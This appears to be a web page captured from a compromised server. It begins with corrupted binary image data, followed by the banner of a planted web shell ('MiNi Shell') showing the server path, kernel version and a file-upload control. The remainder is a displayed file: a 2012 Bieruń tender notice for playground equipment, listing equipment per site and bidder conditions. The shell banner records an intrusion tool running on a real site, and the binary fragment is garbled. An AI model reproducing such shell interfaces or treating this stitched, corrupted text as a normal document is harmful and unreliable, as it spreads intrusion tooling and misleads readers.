JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121024/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121024/226141-N-2012.html

<p class="kh_header"><b>Bieruń: Dostawa i montaż urządzeń na placach zabaw usytuowanych na terenie Bierunia</b><br>
<b>Numer ogłoszenia: 226141 - 2012; data zamieszczenia: 24.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bieruński Ośrodek Sportu i Rekreacji , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 32 324 25 12, faks 32 324 25 28.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bosir.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż urządzeń na placach zabaw usytuowanych na terenie Bierunia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamienia jest dostawa i montaż urządzeń na placach zabaw usytuowanych w dzielnicach na terenie gminy Bieruń:

1. Plac zabaw - Os. ERG
ZESTAWIENIE URZĄDZEŃ ZABAWOWYCH
L.P.	NAZWA URZĄDZENIA	ILOŚĆ SZTUK
1.	Huśtawka bocianie gniazdo 	1
2.	Huśtawka podwójna maluch + zwykła	8
3.	Huśtawka ważka	1
4.	Huśtawka na sprężynie tandem pies	1
5.	Huśtawka na sprężynie autko	1
6.	Huśtawka na przegubach tuba	1
7.	Karuzela talerzowa	1
8.	Ścianka wspinaczkowa	1
9.	Piramida wspinaczkowa II	1
10	Piaskownica	2
11.	Ławka	3
12.	Kosz na śmieci	3
13.	Korytowanie - 1 pole	70m2

2. Plac zabaw - SkatePark
ZESTAWIENIE URZĄDZEŃ ZABAWOWYCH
L.P.	NAZWA URZĄDZENIA	ILOŚĆ SZTUK
1.	Huśtawka bocianie gniazdo 	1
2.	Huśtawka podwójna maluch + zwykła	1
3.	Huśtawka na sprężynie autko	1
4.	Huśtawka na przegubach tuba	1
5.	Karuzela talerzowa	1
6.	Ścianka wspinaczkowa	1
7.	Zjazd linowy	1
8.	Ławka	3
9.	Kosz na śmieci	3
10.	Korytowanie - 2 pola	230m2
3. Plac zabaw - Karlik
ZESTAWIENIE URZĄDZEŃ ZABAWOWYCH
L.P.	NAZWA URZĄDZENIA	ILOŚĆ SZTUK
1.	Huśtawka ważka 	1
2.	Ścianka wspinaczkowa	1
3.	Urządzenie sprawnościowe	1
4.	Ławka	3
5.	Kosz na śmieci	3
6.	Korytowanie 1 pole	100m2

4. Plac zabaw - Baraniec
ZESTAWIENIE URZĄDZEŃ ZABAWOWYCH
L.P.	NAZWA URZĄDZENIA	ILOŚĆ SZTUK
1.	Huśtawka podwójna zwykłą 	1
2.	Ścianka wspinaczkowa	1
3.	Piramida wspinaczkowa II	1
4.	Korytowanie	70m2

5. Plac zabaw - Ściernie
ZESTAWIENIE URZĄDZEŃ ZABAWOWYCH
L.P.	NAZWA URZĄDZENIA	ILOŚĆ SZTUK
1.	Zestaw zabawowy III	1
2.	Huśtawka ważka 	2
3.	Huśtawka ważka z 4 siedziskami	2
4.	Huśtawka bocianie gniazdo 	2
5.	Huśtawka na sprężynie żyrafa	1
6.	Huśtawka na sprężynie tandem pies	2
7.	Huśtawka na sprężynie krówka	1
8.	Huśtawka na sprężynie koń	1
9.	Huśtawka na sprężynie autko	1
10.	Równoważnia na sprężynie	4
11.	Karuzela talerzowa 	1
12.	Piaskownica zamykana	1
13.	Drabinka pozioma	1
14.	Lokomotywa	1
15.	Wagonik	1
16.	Tablica do rysowania	3
17.	Kółko i krzyżyk	3
18.	Piramida wspinaczkowa I	1
19.	Tablica regulaminowa	1
20.	Ławka	4
21.	Stojak na rowery	1
22.	Korytowanie 	140m2
6. Plac zabaw - Czarnuchowice
ZESTAWIENIE URZĄDZEŃ ZABAWOWYCH
L.P.	NAZWA URZĄDZENIA	ILOŚĆ SZTUK
1.	Zestaw zabawowy I	1
2.	Huśtawka ważka	1
3.	Huśtawka bocianie gniazdo	1
4.	Huśtawka na sprężynie koń	1
5.	Huśtawka na sprężynie autko	1
6.	Karuzela talerzowa	1
7.	Ścianka sprawnościowa	1
8.	Drążki gimnastyczne potrójne	1
9.	Kosz na śmieci	4
10.	Tablica regulaminowa 	1
11.	Stojak na rowery	8
12.	Ławka	5
13.	Korytowanie 	140m2

7. Plac zabaw - Bijasowice
ZESTAWIENIE URZĄDZEŃ ZABAWOWYCH
L.P.	NAZWA URZĄDZENIA	ILOŚĆ SZTUK
1.	Zestaw zabawowy III	1
2.	Huśtawka ważka	2
3.	Huśtawka na sprężynie autko	2
4.	Huśtawka na sprężynie krówka	2
5.	Huśtawka na sprężynie lew	2
6.	Huśtawka na sprężynie żyrafa	2
7.	Huśtawka na sprężynie tandem pies	2
8.	Huśtawka na sprężynie pies	1
9.	Huśtawka na sprężynie koń	1
10.	Równoważnia na sprężynie 	1
11.	Karuzela talerzowa	1
12.	Piaskownica zamykana	1
13.	Tablica do rysowania	4
14.	Kółko i krzyżyk	1
15.	Lokomotywa	1
16.	Wagonik	1
17.	Piramida wspinaczkowa I	1
18.	Stojak na rower	2
19.	Tablica regulaminowa	2
20.	Kosz na śmieci	4
21.	Ławka	6
22.	Korytowanie	230m2


8. Plac zabaw - ul. Warszawska
ZESTAWIENIE URZĄDZEŃ ZABAWOWYCH
L.P.	NAZWA URZĄDZENIA	ILOŚĆ SZTUK
1.	Zestaw zabawowy II	1
2.	Huśtawka ważka	2
3.	Huśtawka na sprężynie autko	2
4.	Huśtawka na sprężynie krówka	2
5.	Huśtawka na sprężynie lew	1
6.	Huśtawka na sprężynie żyrafa	1
7.	Huśtawka na sprężynie tandem pies	2
8.	Huśtawka na sprężynie pies	1
9.	Równoważnia na sprężynie	1
10.	Karuzela talerzowa	1
11.	Piaskownica zamykana	1
12.	Tablica do rysowania	8
13.	Kółko i krzyżyk	1
14.	Piramida wspinaczkowa I	1
15.	Ławka	6
16.	Stojak na rower	2
17.	Tablica regulaminowa	1
18.	Kosz na śmieci	4
19.	Korytowanie 	110m2

W zakres zamówienia obejmuje: dostawę (transport) urządzeń na miejsca montażu wskazane przez zamawiającego, montaż urządzeń w miejscach wskazanych przez zamawiającego, nadzór nad montażem - zabudową urządzeń.
Dokładny zakres zamówienia określono w specyfikacji technicznej urządzeń oraz wykonania 
i odbioru urządzeń, wzorze umowy, które są załącznikiem do SIWZ.
Jeżeli w specyfikacji technicznej oraz w  SIWZ określone zostały materiały i urządzenia przy pomocy znaków towarowych, patentu lub pochodzenia, nie oznacza to, że nie można zastosować materiałów 
i urządzeń równoważnych, lecz o nie gorszych parametrach i spełniających wymogi podane 
w specyfikacji technicznej wykonania i odbioru urządzeń. Podane w opisach nazwy własne nie mają na celu naruszenia art. 29 i 7 ustawy Prawo zamówień publicznych, a mają jedynie za zadanie sprecyzowanie oczekiwań jakościowych i technologicznych zamawiającego. Zamawiający dopuszcza rozwiązania równoważne pod warunkiem spełnienia tego samego poziomu jakościowego, technologicznego i wydajnościowego.
Dostarczone i zamontowane urządzenia muszą posiadać wszystkie wymagane Prawem budowlanym 
i polskimi normami, przenoszącymi znormonizowane normy europejskie, atesty, certyfikaty i aprobaty techniczne.
Zamawiający nie przewiduje: zawarcia umowy ramowej, aukcji elektronicznej, udzielenia   zamówień uzupełniających, dynamicznego systemu zakupów, udzielania zaliczek na poczet wykonania umowy, stosowania wymagań, o których mowa w art. 29 ust. 4 ustawy  pzp.
Zamawiający nie dopuszcza składania ofert częściowych, wariantowych.

Kody CPV:
37535200-9  Wyposażenie placów zabaw
37535210-2  Huśtawki (pionowe) do placów zabaw
37535250-4  Huśtawki (poziome) do placów zabaw
37535230-8  Karuzele do placów zabaw.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 37.53.52.10-2, 37.53.52.50-4, 37.53.52.30-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie stosuje się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Posiadają uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają   
 obowiązek posiadania takich uprawnień.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez wykonawcę: 
- oświadczenia (zgodnie z art. 22 ust. 1 pkt 1 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Posiadają wiedzę i doświadczenie: 
Wykonali należycie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania                             o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie,  min. 4 dostawy urządzeń na place zabaw typu karuzele, huśtawki, drabinki, zestawy zabawowe,                     o wartości min. 100 000,00 brutto każda.
Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art. 22 ust.1 pkt 2 ustawy pzp);
- wykazu wykonanych  ww. dostaw urządzeń na place zabaw z podaniem wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem
- dokumentów (np. referencji) potwierdzających, że dostawy te zostały wykonane należycie.
Przez wykonali zamawiający rozumie, że dostawy  zostały zakończone i odebrane   w  okresie ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres jest krótszy - w tym okresie. Wartość zamówienia może obejmować dostawę wraz z niezbędnymi robotami montażowymi.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena  warunku nastąpi łącznie tzn. należy wykazać, że warunek wykonania ww. dostaw spełnia przynajmniej jeden z wykonawców  lub wykonawcy wspólnie ubiegający się o udzielenie zamówienia łącznie wykonali  wymagane dostawy .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie
przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Dysponują osobami zdolnymi do wykonania zamówienia.
    Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie  
     przedłożonego przez wykonawcę:                                                                                                                                                 
      - oświadczenia  (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp).
      W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy 
     wykazać, że warunek  spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć wykonawcy, którzy:
Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia.
    Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/nie spełnia, na podstawie          
     przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 4 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, 
że warunek spełnia przynajmniej jeden z tych wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca przystępujący do postępowania złoży oświadczenie z art. 22 ust. 1 ustawy pzp, że :
1.	Posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.	Posiada wiedzę i doświadczenie  do wykonania zamówienia; 
3.	Dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4.	Znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia.
 Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy. 
Jeżeli wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć  pełnomocnictwo, w formie oryginału lub notarialnie poświadczonej kopii. 
Uwaga:
1.	Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej    
       dostarcza oświadczenia i dokumenty wymienione w pkt. Lista wymaganych oświadczeń   
       oraz  w pkt. Lista wymaganych dokumentów.
       Zamiast dokumentu, o którym mowa w punkcie  2 Listy wymaganych dokumentów  
       przedstawia dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania, 
       potwierdzający odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Dokument, o którym mowa powyżej powinien być wystawiony nie wcześniej niż 6 miesięcy przed 
upływem terminu składania ofert.
       Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej, zastępuje się go
       dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem    
       sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 
       odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce 
       zamieszkania.
       Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentu, o którym mowa w pkt 1
        niniejszej uwagi.
   2.   Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
 3.    W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku                                 
        podmiotów, o których mowa w § 1 ust. 2 i 3 w/w rozporządzenia, kopie dokumentów dotyczących  
        odpowiednio wykonawcy lub podmiotów są poświadczane za zgodność z oryginałem przez  
        wykonawcę lub te podmioty.
 4.   Wykonawca  może  polegać  na  wiedzy  i  doświadczeniu ,  potencjale  technicznym ,  osobach        
        zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,   niezależnie   od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami   niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
       Treść zobowiązania podmiotu trzeciego złożonego w oryginale, powinna określać:
         -  kto jest podmiotem przyjmującym zasoby,
         -  zakres zobowiązania podmiotu trzeciego,
         -  czego dotyczy zobowiązanie,
         -  w jaki sposób będzie zobowiązanie wykonane,
         -  jakiego okresu dotyczy zobowiązanie.
    5.  Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów     dotyczących       
         sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może    przedstawić inny  
         dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego  
          warunku.
 6. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum/  
     spółki cywilnej) do oferty należy dołączyć : 
a)	Pełnomocnictwo  określające zasady reprezentacji ze wskazaniem pełnomocnika ( lidera),  
jego zakresu działania  i   uprawnień do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. 
Pełnomocnictwo  winno zawierać, w szczególności  :
- nazwy wszystkich podmiotów tworzących konsorcjum i udzielających pełnomocnictwa, 
- nazwę firmy Pełnomocnika/Lidera,
- zakres działania Pełnomocnika/Lidera, uprawnień do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy, 
- czas trwania konsorcjum,
- cel zawarcia ( wspólną realizację zamówienia publicznego),
- datę udzielenia pełnomocnictwa,
- podpisy wszystkich podmiotów tworzących konsorcjum zgodne z zasadą ich reprezentacji.
Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem / Liderem. 
        b) Oświadczenia wymienione w pkt. V.A SIWZ powinny być złożone w taki sposób, aby warunki ,                
            o których mowa w pkt. IV SIWZ, wykonawcy występujący wspólnie spełnili łącznie.  
        c) Dokument wymieniony w pkt. V B ppkt. 1 Listy wymaganych dokumentów, powinien być 
            złożony w taki sposób, aby warunki o których mowa w pkt. IV SIWZ, wykonawcy występujący 
            wspólnie spełnili łącznie. 
        d) Dokumenty wymienione w pkt. V B ppkt. 2 i 3 Listy wymaganych dokumentów składa każdy                           
            z wykonawców wchodzących w skład podmiotu występującego wspólnie. 
        e) Kopie dokumentów dotyczących wykonawcy powinny być poświadczane za zgodność 
            z oryginałem przez wykonawcę, którego dokument dotyczy lub przez lidera lub przez wszystkich 
            wykonawców wchodzących w skład tego podmiotu.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany postanowień umowy w zakresie:
a.  Wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany zgodnie                  
     z obowiązującą stawką. 
b. Zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy z zachowaniem 
    wymagań określonych w SIWZ, jakie osoby te powinny spełniać. 
c. Zmiany terminu rozpoczęcia lub zakończenia wykonania przedmiotu umowy, w szczególności zmiany terminów wykonania przedmiotu umowy z powodu: niesprzyjających warunków atmosferycznych; zmiany przepisów; braku możliwości zakupu materiałów i urządzeń  niezbędnych do prowadzenia montażu przedmiotu umowy; okoliczności, których nie można było przewidzieć przy udzielaniu zamówienia; siły wyższej.
d. Mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana        
    powszechnie obowiązujących przepisów prawa. 
e. Innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, a które nie 
    wykraczają poza zakres art. 140 ustawy Prawo zamówień publicznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
